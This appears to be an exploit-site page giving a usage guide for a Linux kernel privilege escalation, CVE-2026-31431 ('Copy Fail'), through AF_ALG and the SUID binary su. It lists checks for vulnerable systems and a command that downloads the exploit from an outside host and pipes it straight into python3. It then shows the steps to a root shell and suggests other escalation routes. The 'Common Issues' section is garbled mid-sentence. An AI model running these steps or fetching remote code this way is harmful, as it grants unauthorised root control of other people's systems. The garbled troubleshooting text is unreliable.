Share
## https://sploitus.com/exploit?id=D2A0FCDA-5573-5EBB-8FBB-18C8D8A3733A
# Copy Fail (CVE-2026-31431) โ Exploit Usage Guide
## โ ๏ธ Disclaimer
This content is for educational and authorized security testing purposes only. Do **NOT** run this on systems without explicit permission.
---
## ๐ Overview
**Copy Fail (CVE-2026-31431)** is a Linux Local Privilege Escalation (LPE) vulnerability affecting the kernel crypto API via `AF_ALG`.
It allows an unprivileged user to overwrite page cache data of a SUID binary (e.g., `/usr/bin/su`) and gain root access.
---
## ๐ง Requirements
### System Requirements
- Linux kernel (vulnerable โ depends on patch status)
- `AF_ALG` enabled
- `algif_aead` module loaded
### Python Exploit Requirements
- Python **3.10+**
- Support for:
- `os.splice`
- `socket(AF_ALG)`
---
## ๐ Checking Vulnerability
```bash
uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
```
Expected indicators:
- `authencesn(hmac(sha256),cbc(aes))`
- `algif_aead` loaded
---
## ๐ Running the Python Exploit
### 1. Execute directly
```bash
python3 copy_fail_exp.py
```
### 2. Or via curl (if remote hosted)
```bash
curl https://copy.fail/exp | python3
```
### 3. Trigger root shell
```bash
su
id
```
Expected result:
```bash
uid=0(root)
```
---
## โ ๏ธ Common Issues (Python)
### โ Error: `os.splice not found`
Cause:
- Python version /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
```
### Apply kernel patch
Update your system:
```bash
apt update && apt upgrade
```
---
## ๐ Notes
- Exploit modifies **page cache only** (non-persistent)
- Requires local access
- Not remotely exploitable by default
---
## ๐ง Final Insight
If the exploit fails, consider:
- Kernel already patched
- Environment restrictions
- Alternate privilege escalation vectors (SUID, capabilities, sudo misconfig)
---
## ๐ References
- https://copy.fail/
- CVE-2026-31431
---
## ๐จโ๐ป Author Notes
Use this exploit responsibly in labs, CTFs, and authorized pentests only.